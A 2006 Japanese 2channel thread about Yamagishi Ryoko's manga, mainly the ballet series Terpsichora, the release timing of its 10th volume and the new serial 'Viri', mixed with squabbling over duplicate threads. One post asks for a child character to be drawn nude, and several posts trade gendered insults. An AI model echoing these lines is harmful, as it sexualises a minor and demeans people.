727 :名無しんぼ@お腹いっぱい:2006/10/31(火) 23:59:16 ID:cig4FYBlO
調子にノンナ
イワンこっちゃない

728 :名無しんぼ@お腹いっぱい:2006/11/01(水) 01:30:54 ID:zB+66CNe0
また懐かしい言い回しを…w

729 :名無しんぼ@お腹いっぱい:2006/11/01(水) 23:54:28 ID:NKIMlegO0
このスレは変な駄洒落とか成りきりとか掛け合いとか
を周りが引いているにもかかわらずしつこく続けて
自分で受けまくると言うお方が集まってますから

テヘ

730 :名無しんぼ@お腹いっぱい:2006/11/02(木) 04:14:20 ID:f28NJYDm0
また婆がいがみ合ってるのか・・・・

731 :名無しんぼ@お腹いっぱい:2006/11/02(木) 08:49:24 ID:AZeIjyeu0
このスレに生息する汚らしい婆にとって
才能豊かな美少女がイジメに苦しみぬいて、身投げしてグチャミソに死んでいくのは
さぞかし痛快なんだろうなw

732 :名無しんぼ@お腹いっぱい:2006/11/02(木) 13:23:10 ID:9U8nZbBK0
マルチうざい

733 :名無しんぼ@お腹いっぱい:2006/11/05(日) 09:47:08 ID:ejKmSUTF0
下らないやり取りが続いた後は過疎
この板にスレ立てたのは完全に失敗だったね

ギシギシしながらも軌道修正繰り返して続いていく
あっちの方が本流らしい

734 :名無しんぼ@お腹いっぱい:2006/11/05(日) 14:27:33 ID:3i7gwPdG0
あっちのスレもたいがいくだらないがw

735 :名無しんぼ@お腹いっぱい:2006/11/06(月) 01:44:57 ID:vnMUulRSO
あっちに嵐が来たからこっちに立ったんだよね?
避難所的役割は果たしたからいいじゃん

736 :名無しんぼ@お腹いっぱい:2006/11/06(月) 02:47:06 ID:S5/Yjjg/0
こっちにも荒らしが来るから・・・
とりあえず733はもうこないでね。

737 :名無しんぼ@お腹いっぱい:2006/11/06(月) 05:13:36 ID:pq+q3As60
読みきりのタイトルやジャンル(心理モノとか神話モノとか)は
まだわかんないのかな?

738 :名無しんぼ@お腹いっぱい:2006/11/06(月) 05:18:44 ID:GPcNdf5k0
バレエネタなのかそれ以外なのかは知りたいねえ。

739 :名無しんぼ@お腹いっぱい:2006/11/06(月) 09:43:13 ID:vnMUulRSO
じゃ私はバレエ以外の話に賭ける
つD

740 :名無しんぼ@お腹いっぱい:2006/11/06(月) 10:26:02 ID:epPa2m+i0
少女漫画スレにて、今月号では予告がなかった模様。
タイムリーなんで、いじめについてなにか描いてほしいな・・・。
できれば、ケバコみたいなキャラが破滅しそうなヤツw

741 :名無しんぼ@お腹いっぱい:2006/11/06(月) 16:35:24 ID:L9nvLTMV0
今月号のダヴィンチは全く山岸の文字はなく、読む所はないです。
でもプチ情報。今月でヌイグルマーは打ち切りになりました。

なので>>698の様に来月からの短編が
いつもよりちょっと多いと言う事もありえるかも……。

742 :名無しんぼ@お腹いっぱい:2006/11/06(月) 16:47:29 ID:/PWokL4wO
>>698スゴス
休載どころか打ち切りにw

743 :名無しんぼ@お腹いっぱい:2006/11/07(火) 00:50:57 ID:1SjJpPtL0
個人的にはハトシェプストの続きを描いてほしい。

744 :名無しんぼ@お腹いっぱい:2006/11/07(火) 01:14:20 ID:h7J81Ihe0
あっちに嵐が来たからこっちなら大丈夫という理屈がよく分からない
下らないのとかギシギシがあるのはどっちもどっちだし
2つあるのがめんどくさい

745 :名無しんぼ@お腹いっぱい:2006/11/07(火) 02:13:08 ID:6y5D4DB/O
少女漫画板はID出ないから、自演し放題荒らし放題だから、疑心暗鬼になってた。
IDが出る漫画板なら自演が見抜けるから、少なくともその抑止力になると考えられてここに立てられた。
実際、こっちには在日とか皇室とか共学とか基地外じみた荒らしは来てない。
変なのが来ても単発だし。


下らなかったりギシギシすんのは住民の気質だからしょうがない。


避難所として見ると不自然だけど、このスレだけ独立して見ると
山岸スレとして機能してていいよ。


二つあって面倒くさいというのもわかるけど
それほど話は平行してないから混乱はしないよ。

746 :名無しんぼ@お腹いっぱい:2006/11/07(火) 20:16:51 ID:h7J81Ihe0
あっちに嵐が来たからこっちなら大丈夫という理屈がよく分からない
下らないのとかギシギシがあるのはどっちもどっちだし
2つあるのがめんどくさい

747 :名無しんぼ@お腹いっぱい:2006/11/07(火) 20:17:24 ID:CuUDF4bE0
なら来るなよ

748 :名無しんぼ@お腹いっぱい:2006/11/07(火) 20:20:58 ID:h7J81Ihe0
あっちに嵐が来たからこっちなら大丈夫という理屈がよく分からない
下らないのとかギシギシがあるのはどっちもどっちだし
2つあるのがめんどくさい

749 :名無しんぼ@お腹いっぱい:2006/11/07(火) 20:45:59 ID:CuUDF4bE0
荒らしか・・・

750 :名無しんぼ@お腹いっぱい:2006/11/07(火) 21:45:37 ID:h7J81Ihe0
2つあるのがめんどくさい







751 :名無しんぼ@お腹いっぱい:2006/11/08(水) 17:42:39 ID:tktUFxfc0
めんどくさい人はこっち見なくていいから。
誰も頼んでないよw

752 :名無しんぼ@お腹いっぱい:2006/11/08(水) 18:16:41 ID:us+O9sRi0
伸びてるから予告話で盛り上がってるかと思ったのに!
今日やっとダビンチ確認。

753 :名無しんぼ@お腹いっぱい:2006/11/08(水) 22:01:40 ID:3NWZn+7U0
昔変ななりきりとかが多かった処天スレが
意外にもまともなやり取りで伸びている。
ここは微妙ですなぁ

754 :名無しんぼ@お腹いっぱい:2006/11/08(水) 22:59:24 ID:Kv6M51k+0
エキストラの着替えだけでなく、六花ちゃんの裸もしっかり描いて欲しい。

755 :名無しんぼ@お腹いっぱい:2006/11/09(木) 00:58:55 ID:mUVQCjS90
ここはショタスレとなったのですか?
ギシモノでショタってかなりキモイよ。

756 :名無しんぼ@お腹いっぱい:2006/11/10(金) 23:44:05 ID:WFj/E87L0
ショタってのはかわいい男の子大好き病なんだが

757 :名無しんぼ@お腹いっぱい:2006/11/11(土) 15:25:28 ID:AQ2zjOqM0
じゃあペドスレ?

758 :名無しんぼ@お腹いっぱい:2006/11/12(日) 00:22:37 ID:CiHCXvuA0
フィギュアスケートの澤田が滑走前に過緊張とかいうやつをやってた。

759 :名無しんぼ@お腹いっぱい:2006/11/12(日) 03:13:14 ID:bUXoTmKG0
NHK教育・能舞台でわかったが、
「夜叉御前」の鬼って、六条御息所のイメージなんだね。
上手いなぁ。


760 :名無しんぼ@お腹いっぱい:2006/11/14(火) 12:40:55 ID:bSFqIlalO
保守

761 :名無しんぼ@お腹いっぱい:2006/11/17(金) 10:15:15 ID:9c83ty3z0
新体操のベッソノワが今日本に来てるよ

762 :名無しんぼ@お腹いっぱい:2006/11/19(日) 03:20:58 ID:xeWTd5mkO
前に話題になってたきれいな子だっけ?
さっきテレビでやってた

763 :名無しんぼ@お腹いっぱい:2006/11/19(日) 17:08:48 ID:CLmxz05+0
この閑古鳥ぶりは一体・・・
他山岸スレは普通ににぎわってるのに

764 :名無しんぼ@お腹いっぱい:2006/11/19(日) 20:19:38 ID:I++vAuHi0
読みきりが掲載されたらここに感想書く予定。
今は話題がねえ。

765 :名無しんぼ@お腹いっぱい:2006/11/21(火) 02:36:50 ID:PxzG29eGO
そうよねえ。

766 :名無しんぼ@お腹いっぱい:2006/11/21(火) 20:35:23 ID:43RQHoei0
所詮捨てスレですから

767 :名無しんぼ@お腹いっぱい:2006/11/22(水) 02:08:33 ID:zPuPqFWK0
このスレが悔しい人がいるのか・・・
意味が分からん・・・

768 :花と名無しさん :2006/11/22(水) 06:06:14 ID:RKFYP3yk0
10巻まだー?(・∀・ )っ/凵 ⌒☆チン

769 :名無しんぼ@お腹いっぱい:2006/11/23(木) 11:23:27 ID:u3X/FzswO
まだ

770 :名無しんぼ@お腹いっぱい:2006/11/23(木) 20:23:03 ID:DFqg0CuC0
12月だっけ?

771 :名無しんぼ@お腹いっぱい:2006/11/23(木) 20:25:59 ID:t+3Pda7o0
年内は粍

772 :名無しんぼ@お腹いっぱい:2006/11/25(土) 17:08:31 ID:log3K6VG0
hosyu

773 :名無しんぼ@お腹いっぱい:2006/11/25(土) 23:55:04 ID:0Ywf6Yx70
まーどっちでもいいけど重複スレってあんま好きじゃない

774 :名無しんぼ@お腹いっぱい:2006/11/26(日) 11:22:24 ID:W7n+FaWpO
誤爆乙

775 :名無しんぼ@お腹いっぱい:2006/11/26(日) 11:56:41 ID:wrKBGqS50
山岸ものがいわゆる少女漫画かといわれると
男性読者の鑑賞にも十分耐えうるし
内容は深いし違うと思うんだけど

最近女性作家も多い大人向けの一般マンガを多く載せてる
青年誌むけかというとやっぱ違うでしょって感じだし
ものによっては大丈夫なのもあると思うけど

不倫女が延々恨み言や男性の身勝手さを独白するのとかうんざりだろうし
美少年キャラが変な超能力使うのとか 一部の人を除けばプケラだろうし


776 :名無しんぼ@お腹いっぱい:2006/11/26(日) 13:00:47 ID:dWNUz1Go0
幼女を首絞めレイプとか、おばさんにしてはなかなかやってくれる、大人のマンガですわ。

777 :名無しんぼ@お腹いっぱい:2006/11/26(日) 18:46:58 ID:E71qo/Pp0
初期から「少女漫画」の範囲で納まりきれない感じだったね。
(佐々木倫子とか遠藤淑子とか、
北海道出身の女性作家って男でも読める作風の人が多い??)

778 :名無しんぼ@お腹いっぱい:2006/11/26(日) 18:48:10 ID:tT2cXe1D0
高橋留美子とか山下和美とか。

779 :名無しんぼ@お腹いっぱい:2006/11/26(日) 22:33:24 ID:sAix2Iex0
三宅乱丈とか

780 :名無しんぼ@お腹いっぱい:2006/11/27(月) 00:27:54 ID:TKDR7g350
男性読者でも面白い、というのと両性向けな漫画、って
イコールじゃないと思う。
動物のお医者さんはテーマ自体は恋とかメルヘンじゃなくて
獣医というジャンルであり大学生活で両性に共通したものだけど
マンガ自体はいろんな意味で少女漫画だと思う。
男性が読んでも面白い少女漫画。

山岸先生の首絞め少女レイプは青年誌においてふさわしいもんじゃないし
完全に女視点のレイプ。

781 :名無しんぼ@お腹いっぱい:2006/11/27(月) 01:10:59 ID:MAiaSmDAO
同じぐらいの年代某御大のスレにはすぐフェミが登場するんだがあまりそういったことがないな。

782 :名無しんぼ@お腹いっぱい:2006/11/27(月) 05:30:39 ID:xYOsT7a70
そうでもない

783 :名無しんぼ@お腹いっぱい:2006/11/27(月) 12:53:31 ID:LJvWTk/10
氷点の歌「六花譚」
最初見たとき「ゆきかたり」と勝手に脳内変換されちゃって
おっ チトセも舞姫読んでいるのかーと思ってしまたよ

ロッカバラード・・・ロッカーで逝ってヨシ!


784 :名無しんぼ@お腹いっぱい:2006/11/27(月) 20:09:42 ID:/oFty20U0
ユキタンって読んじゃった…。

785 :名無しんぼ@お腹いっぱい:2006/11/28(火) 00:12:42 ID:SCCsxmKMO
典型的フェミは来ない気がする。

786 :名無しんぼ@お腹いっぱい:2006/11/28(火) 00:21:32 ID:ZcHk3Je1O
フェミが来るスレってどこ?

787 :名無しんぼ@お腹いっぱい:2006/11/28(火) 02:52:18 ID:bAWzPEV00
主婦をひたすら憎んでる人は来るねw

788 :名無しんぼ@お腹いっぱい:2006/11/29(水) 02:15:46 ID:C8kK0zdQ0
毛箱も処分をうけて出席停止になるか・・・
あ、教師はまだ気がついてないんだっけ

作者、時代を読んでるよね・・・
このすれも、もうひとつの技師すれも、人多すぎではいれなかったから
この話題でにぎわってるのかと思った


789 :名無しんぼ@お腹いっぱい:2006/11/29(水) 17:44:02 ID:AhzGshAvO
山岸さんの絵が一番gdgdだったのは、鬼や押し入れあたりでOK?

790 :名無しんぼ@お腹いっぱい:2006/11/30(木) 00:10:05 ID:M+HfkA3x0
10巻っていつ頃発売?

791 :名無しんぼ@お腹いっぱい:2006/11/30(木) 01:30:39 ID:0Qu9kBiA0
第二部の開始と同時発売の予感。
最近そういう抱き合わせが多い。

792 :名無しんぼ@お腹いっぱい:2006/11/30(木) 17:51:32 ID:uUJmw5wP0
10巻っていつ頃発売?

793 :名無しんぼ@お腹いっぱい:2006/11/30(木) 18:33:45 ID:G8UE/cCc0
>791
今年はもう出ないみたいだけど、千花自殺で第一部が終わる展開だから
さっさと出して欲しいな。
今まで刊行ペースが一定だったし。
でも第二部開始前に発売だとやっぱり読者が減るものなんだろうか。

794 :名無しんぼ@お腹いっぱい:2006/12/01(金) 13:18:15 ID:m5kwD1DNO
早くブームが終わりますように…。早く10巻読みたいから。

795 :名無しんぼ@お腹いっぱい:2006/12/01(金) 17:00:21 ID:IuB5M5qV0
1 2001/6
2 2001/12
3 2002/10/23
4 2003/6/23
5 2003/12/22
6 2004/8/23
7 2005/3/23
8 2005/11/22
9 2006/7/22


約半年おきか。
早くても年末か年明けかな。でも年内はないという情報。
もしかしたら短編も合わせて10-11巻同時という事も?
一冊にするには半端な話数で第一部が終わっちゃったからね。

796 :名無しんぼ@お腹いっぱい:2006/12/02(土) 01:00:44 ID:DYzuRgsm0
わざわざ第二部開始に合わせたりはしないと思う。
第二部開始だからといって、巻頭カラーになったりする雑誌ではないわけだし。
それより第一部とはいえ「完」になっちゃったんだから、早く出さないと売り時を逃してしまう。

797 :名無しんぼ@お腹いっぱい:2006/12/03(日) 01:45:28 ID:4yi25O6A0
過剰な千花好きってかわいいタイプに負け続けて
鬱憤たまってるタイプかね
ここに多いよね

しかも自分の狭量さを不器用、引っ込み思案とか
頭が固いのを損な優等生だからとか
醜いのを飾り立てるが好きじゃないとか

変換してる感じ

798 :名無しんぼ@お腹いっぱい:2006/12/03(日) 01:52:39 ID:KoXEjPFc0
なんだ?突然。

799 :名無しんぼ@お腹いっぱい:2006/12/04(月) 04:39:31 ID:sEZcjnDF0
たしかに唐突だが、いえてる面も無きにしも非ず。

800 :名無しんぼ@お腹いっぱい:2006/12/04(月) 13:45:48 ID:SnHC+ym3O
過剰なチカ好きつうより、過剰なユキアンチはそんな感じかな

801 :名無しんぼ@お腹いっぱい:2006/12/04(月) 21:05:56 ID:DMtUQfe70
明後日はたしか短編だっけ?

802 :名無しんぼ@お腹いっぱい:2006/12/05(火) 00:40:48 ID:rCcjfl1P0
うん。楽しみ。

803 :名無しんぼ@お腹いっぱい:2006/12/06(水) 18:23:20 ID:vrvjEXTw0
誰か今月の短編読んだ人いる?
どうだったのかな。

804 :名無しんぼ@お腹いっぱい:2006/12/06(水) 18:27:48 ID:AjGaK/kg0
短編は議論の盛んなあっちの板でもかなりビミョーな反応
こちらにいたっては見事に閑古鳥

805 :名無しんぼ@お腹いっぱい:2006/12/06(水) 21:36:43 ID:W1esI8oh0
うは忙しくて忘れてた、本屋いけてねぇ〜

806 :名無しんぼ@お腹いっぱい:2006/12/06(水) 22:43:48 ID:3Rkzy5ib0
まあそんなあわてて読む様な内容じゃなかったよ。

ただ、一月発売の10巻で第一部完まで入るそうなので、
半端な事にならなくて良かったね。

807 :名無しんぼ@お腹いっぱい:2006/12/07(木) 01:41:59 ID:BkNa02+Y0
なんかのついでに読めたら読む、でいい感じ。
すっかりバレエづいちゃってるな。
山岸先生が筆を折る前に歴史物の短編読みたいな。
「神かくし」みたいな。

808 :名無しんぼ@お腹いっぱい:2006/12/07(木) 02:45:48 ID:cy7MdkxJ0
「神かくし」って歴史物?
主計が、なぜか若き日の加藤剛(要は大岡越前w)だと思った。

809 :名無しんぼ@お腹いっぱい:2006/12/07(木) 09:35:47 ID:6Tk0Hs6GO
「神かくし」って犬面の宇宙人の話もあるよね
あれはワロタ

810 :名無しんぼ@お腹いっぱい:2006/12/07(木) 13:00:31 ID:aJMu7Iur0
アレ要らないよね。
まさに蛇足w

811 :名無しんぼ@お腹いっぱい:2006/12/07(木) 21:01:03 ID:d+TcX2y60
短編、最初から悲劇の予感

812 :名無しんぼ@お腹いっぱい:2006/12/07(木) 22:13:45 ID:FJabfu2L0
>>809
ワロタ?
子供の頃うっかり読んでトラウマになったよ…

813 :名無しんぼ@お腹いっぱい:2006/12/07(木) 22:24:06 ID:BkNa02+Y0
>812
子供のときに見たら恐いだろうな、あれ。
なんであんなに恐く描けるんだろう。松井にしても鬼にしても単純な線なのに。

814 :名無しんぼ@お腹いっぱい:2006/12/08(金) 10:49:50 ID:XN8ykesB0
まだ前フリだから、なんとも言えないな・・・。
テレプシの単行本に収録するために、似たような設定にしたのかな。

815 :名無しんぼ@お腹いっぱい:2006/12/08(金) 23:55:59 ID:CwRCLXHd0
やっと読んだ 後編に期待だね〜

816 :名無しんぼ@お腹いっぱい:2006/12/10(日) 00:45:35 ID:KcCy3RGq0
他の板と違ってしょぼしょぼだし
全然「総合」じゃない・・






817 :名無しんぼ@お腹いっぱい:2006/12/10(日) 01:02:01 ID:478+0C/j0
またお前か

818 :名無しんぼ@お腹いっぱい:2006/12/10(日) 21:16:19 ID:LANFNJYN0
短編って何ヶ月やるんだっけ?
あの進み具合からいうと5回くらいは掲載するのかな?

819 :名無しんぼ@お腹いっぱい:2006/12/11(月) 18:42:09 ID:g2eju2CD0
>818
5回分だとコミックス1冊になるね。
2,3回で終わりそうな話じゃないしそれくらいやるのかも。

820 :名無しんぼ@お腹いっぱい:2006/12/11(月) 21:07:28 ID:mqiEImZU0
春には第二部が始まるんでなかった?
3回と見てたんだが…

821 :名無しんぼ@お腹いっぱい:2006/12/11(月) 22:18:20 ID:HqpLL/Da0
テレプシの健全モードでたまった暗黒面を全開にした猟奇な読みきりを期待してたんだけど・・・
まあ普通の読み物っぽいね。
はやくテレプシ再開して欲しい・・・

822 :名無しんぼ@お腹いっぱい:2006/12/12(火) 02:47:38 ID:H/nYSan0O
ありえない話だけど、今までの短編の後日談とかペロッとでいいから、
まとめて読んでみたい…と少し思った
キエー響子さんその後(案外、病気治って普通の主婦してたり)
キメイラの翔さんその後(て、ずっと刑務所か)
クーフーリンは、今どこで何してんだろ…
あ短編じゃなかった

823 :名無しんぼ@お腹いっぱい:2006/12/12(火) 03:58:15 ID:70IhHZ0g0
作者、シリアスばっかで飽きて、
息抜き風のエッサイマンガにすると思って宝、意外だった。

824 :名無しんぼ@お腹いっぱい:2006/12/12(火) 22:49:21 ID:0LWSho0M0
「ゆうれい談」の新作やってほしいw

825 :名無しんぼ@お腹いっぱい:2006/12/13(水) 00:36:30 ID:oVPI7xJLO
>>823
エッサイ
ワロタ

826 :名無しんぼ@お腹いっぱい:2006/12/14(木) 01:00:17 ID:jQ4KSvaX0
頑張って話題連ねてるんだからそれぐらい大目に(w

827 :名無しんぼ@お腹いっぱい:2006/12/14(木) 09:16:27 ID:sneBZ3DL0
414 :陽気な名無しさん :2006/12/07(木) 01:20:19 ID:hH5XUUGK
「ダ・ヴィンチ」掲載の山岸凉子の短期集中連載、「ヴィリ」見た?
すごいわよ。テレプシなんか吹っ飛んじゃった。
あれは「鏡よ、鏡‥」のバレエ版かしら?
羽深緋鶴みたいな伝説のバレリーナ(43歳)と
拒食症?でガリガリに痩せた可愛い若手バレリーナの娘。
ジゼルの発表会、どうなるのかしら?
ぐいぐい引き込まれてしまった。


828 :名無しんぼ@お腹いっぱい:2006/12/14(木) 19:31:18 ID:IDe875m80
♪エーッサイ エーッサイ エッサイホイサッサ
 ヲバンのバレエだホイサッサ
 中年オバンが色気だし
 娘は虚飾で倒れたよ

>テレプシなんか吹っ飛んじゃった。
思わず踊りだしてしまったよ あたしゃ

829 :名無しんぼ@お腹いっぱい:2006/12/14(木) 21:18:04 ID:kJH+bcRg0
新作ここでは無反応だったけど、俺はかなり面白かった
面白かったというか、続きを色々想像しちゃう、先が楽しみな導入だった

まあ>>827のは言いすぎだけどな…

830 :名無しんぼ@お腹いっぱい:2006/12/15(金) 00:49:15 ID:+Big18Nb0
>829
そうそう、短期の連載なのにこの先どうなるかって思った。
・ジゼルの発表会
・IT社長との関係
・母娘の関係と娘の拒食症
・演出家とフランス語堪能な秘書がどうからんでくるのか
これ全部描いてくれるのかなあ。

831 :名無しんぼ@お腹いっぱい:2006/12/15(金) 01:12:05 ID:TPh1iVFh0
自分の書き込みに
そうそう、
とレスる寂しさよ・・

832 :調子麻呂:2006/12/15(金) 02:29:43 ID:R55eEulmO
まさに涙そうそう

833 :名無しんぼ@お腹いっぱい:2006/12/15(金) 03:33:15 ID:A+gQVB6C0
エロイムエッサイム〜♪エロイムエッサイム〜♪

834 :名無しんぼ@お腹いっぱい:2006/12/16(土) 04:42:40 ID:tBgsd+wcO
>>827
陽気な名無しさん
どこの板か分からなかった…
口調から当たりをつけてみたら、ビンゴだったわよ!

835 :名無しんぼ@お腹いっぱい:2006/12/18(月) 17:40:33 ID:Qo4xuoWH0
「わよ!」ってへんなのー(w
オバサンってまだそういう言葉使うの?

836 :名無しんぼ@お腹いっぱい:2006/12/18(月) 20:53:21 ID:LaR2fLaC0
男おばさんは使いそう

837 :名無しんぼ@お腹いっぱい:2006/12/19(火) 02:41:41 ID:8voGk8XkO
>>835
ヒント 陽気な名無しさん

838 :名無しんぼ@お腹いっぱい:2006/12/19(火) 12:57:01 ID:OuVydUxK0
サザエさんか

839 :名無しんぼ@お腹いっぱい:2006/12/19(火) 22:15:01 ID:yU5XyRYN0
教育TVでやってる「バレエスーパーレッスン」で
若手の男の子がバレリーナをサポートしてて、
先生が「こうやるんだよ」とお手本を示すのを見て

ミロノフ先生がノンナと踊る時に
「僕のときとは違う!」って思った
アラベスクのレミルを連想するなー


840 :名無しんぼ@お腹いっぱい:2006/12/23(土) 01:52:24 ID:FWR4cQCgO
保守

841 :名無しんぼ@お腹いっぱい:2006/12/26(火) 12:08:34 ID:nPs3t3Om0
保守

842 :名無しんぼ@お腹いっぱい:2006/12/26(火) 16:52:35 ID:/Y/QzXf/0
「だっくす」の特集号でハマった年寄りの俺が来ましたよ
なんか…旧作の話題は出しにくい雰囲気だな…総合スレなのに(´・ω・`)

843 :名無しんぼ@お腹いっぱい:2006/12/26(火) 17:38:14 ID:Q+KNLYPg0
ttp://comic6.2ch.net/test/read.cgi/gcomic/1166875392/l50
 
の方のスレのほうが普通に新旧の話題が続いてるよ
まあ時々はギシギシするけど(w
ここを基準に考えないで欲しい・・

844 :842:2006/12/26(火) 19:16:15 ID:3qtYhX2r0
>>843
dクス

845 :名無しんぼ@お腹いっぱい:2006/12/29(金) 10:28:40 ID:tu8ri5j60
保守

846 :名無しんぼ@お腹いっぱい:2006/12/29(金) 14:43:16 ID:Aztul1GM0
過疎

847 :名無しんぼ@お腹いっぱい:2006/12/29(金) 22:30:16 ID:xyXZgYx+0
処天スレが1番カキコが頻繁だ。

848 :名無しんぼ@お腹いっぱい:2006/12/29(金) 23:48:38 ID:akOw4XUa0
ファン層からして変にぎしつくのはよくあることなんだが
このスレは独特の痛さというかキモさが・・

199 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)